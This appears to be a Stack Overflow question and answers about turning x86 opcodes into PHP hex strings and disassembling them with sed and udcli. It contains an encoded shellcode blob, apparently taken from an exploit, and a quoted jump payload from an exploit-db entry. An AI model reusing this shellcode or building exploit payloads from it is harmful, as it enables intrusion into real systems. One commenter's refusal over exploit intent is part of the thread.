# How to Convert ASM Code(opcodes) To String

Tags: string, assembly, x86, disassembly, opcodes

How can I convert assembly codes to string like this in PHP:

```
$shellcode =
"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf4".
"\x47\xba\xa4\x83\xeb\xfc\xe2\xf4\x08\xaf\xfe\xa4\xf4\x47\x31\xe1".
"\xc8\xcc\xc6\xa1\x8c\x46\x55\x2f\xbb\x5f\x31\xfb\xd4\x46\x51\xed".
"\x7f\x73\x31\xa5\x1a\x76\x7a\x3d\x58\xc3\x7a\xd0\xf3\x86\x70\xa9".
"\xf5\x85\x51\x50\xcf\x13\x9e\xa0\x81\xa2\x31\xfb\xd0\x46\x51\xc2".
"\x7f\x4b\xf1\x2f\xab\x5b\xbb\x4f\x7f\x5b\x31\xa5\x1f\xce\xe6\x80".
"\xf0\x84\x8b\x64\x90\xcc\xfa\x94\x71\x87\xc2\xa8\x7f\x07\xb6\x2f".
"\x84\x5b\x17\x2f\x9c\x4f\x51\xad\x7f\xc7\x0a\xa4\xf4\x47\x31\xcc".
"\xc8\x18\x8b\x52\x94\x11\x33\x5c\x77\x87\xc1\xf4\x9c\xb7\x30\xa0".
"\xab\x2f\x22\x5a\x7e\x49\xed\x5b\x13\x24\xdb\xc8\x97\x47\xba\xa4";
```

I guess this is opcodes of asm codes written in HEX. But if so, how can I convert asm codes like these strings?

Comment: This is not assembly code. This is a series of bytes written in ASCII in hexadecimal format. Do you want to disassemble this or do you want to convert each hexadecimal value to a corresponding ASCII or UTF-8 character?

Answer (score 2, accepted):

If using PHP is not a requirement, this can be done easily in Linux console by using eg. `udcli` disassembler that comes with [udis86 disassembler library](http://udis86.sourceforge.net/). You can check my answer to [Disassembling file that contain big data or is compressed](https://stackoverflow.com/questions/14470900/disassembling-file-that-contain-big-data-or-is-compressed/14471274#14471274) .

For this particular case of yours using eg. `sed` does nicely the job to convert the data to a format usable by `udcli`:

```
$ echo '\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf4". "\x47\xba\xa4\x83\xeb\xfc\xe2\xf4\x08\xaf\xfe\xa4\xf4\x47\x31\xe1". "\xc8\xcc\xc6\xa1\x8c\x46\x55\x2f\xbb\x5f\x31\xfb\xd4\x46\x51\xed". "\x7f\x73\x31\xa5\x1a\x76\x7a\x3d\x58\xc3\x7a\xd0\xf3\x86\x70\xa9". "\xf5\x85\x51\x50\xcf\x13\x9e\xa0\x81\xa2\x31\xfb\xd0\x46\x51\xc2". "\x7f\x4b\xf1\x2f\xab\x5b\xbb\x4f\x7f\x5b\x31\xa5\x1f\xce\xe6\x80". "\xf0\x84\x8b\x64\x90\xcc\xfa\x94\x71\x87\xc2\xa8\x7f\x07\xb6\x2f". "\x84\x5b\x17\x2f\x9c\x4f\x51\xad\x7f\xc7\x0a\xa4\xf4\x47\x31\xcc". "\xc8\x18\x8b\x52\x94\x11\x33\x5c\x77\x87\xc1\xf4\x9c\xb7\x30\xa0". "\xab\x2f\x22\x5a\x7e\x49\xed\x5b\x13\x24\xdb\xc8\x97\x47\xba\xa4";"' | sed 's/\\x/ /g' | sed 's/"//g' | sed 's/\.//g' | sed 's/;//g' | udcli -x -32
```

Comment: Please look at this: http://www.exploit-db.com/exploits/5536/
--
He says:
$scode = "\x66\x83\xC0\x04\xFF\xE0"; /*ADD EAX, 4 => JMP EAX*/
But how did he convert asm code to \x...\x... ?
--
Actually i want to do this for inline asm but i dont know how to convert. Thanks..

Comment: I see here no legitimate purpose for your attempt to exploit remote servers by using a PHP script. If you were a sys admin wanting to legitimately test the vulnerability of your own server, I assume you knew enough about assembling, disassembling, hex dumps and regexes that you wouldn't need to ask how to assemble x86 assembly code and make a hex dump of the binary in a format suitable for PHP. I can't help you in this attempt.

Comment: Thank you for response.
I just wanted to give a obvious example about my question.
I wont code exploit of course, but i will use this for patching binaries for personal purposes.
.. Anyway i found the solution! : https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding .
Thank you all